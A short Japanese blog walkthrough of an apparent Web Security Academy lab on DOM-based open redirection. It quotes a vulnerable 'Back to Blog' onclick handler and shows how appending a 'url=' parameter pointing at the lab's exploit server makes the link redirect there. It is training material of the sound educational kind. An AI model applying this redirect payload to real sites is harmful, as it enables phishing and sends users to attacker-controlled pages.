Shikata Ga Nai

Private? There is no such things.

DOM-based open redirectionをやってみた

Hello there, ('ω')ノ

 

DOMベースのオープンリダイレクトを。

 

ソースコードを見ると、Back to Blogのリンク処理は以下のとおりで。

urlパラメータが設定されているとそちらへ遷移するようで。

 

<a href='#'

onclick='returnUrl = /url=(https?:\/\/.+)/.exec(location);

if(returnUrl)location.href = returnUrl[1];

else location.href = "/"'

>Back to Blog</a>

 

現在のURLは以下のとおりで。

https://ac511f831f7308a68071035f005700dc.web-security-academy.net/post?postId=10

 

f:id:ThisIsOne:20210225163518p:plain

 

まずは、リダイレクトさせるエクスプロイトサーバのURLをコピーしておいて。

 https://acd41fda1f5b0840806b03d7012b00b2.web-security-academy.net/

 

f:id:ThisIsOne:20210225164105p:plain

 

現在のURLの後ろにリダイレクトするパラメータを追加して。

https://ac511f831f7308a68071035f005700dc.web-security-academy.net/post?postId=10

&url=https://acd41fda1f5b0840806b03d7012b00b2.web-security-academy.net/

 

 

f:id:ThisIsOne:20210225164209p:plain

 

Back to Blogをクリックすると。

 

f:id:ThisIsOne:20210225164607p:plain

 

エクスプロイトサーバへリダイレクトされた。

 

f:id:ThisIsOne:20210225164625p:plain

 

Best regards, (^^ゞ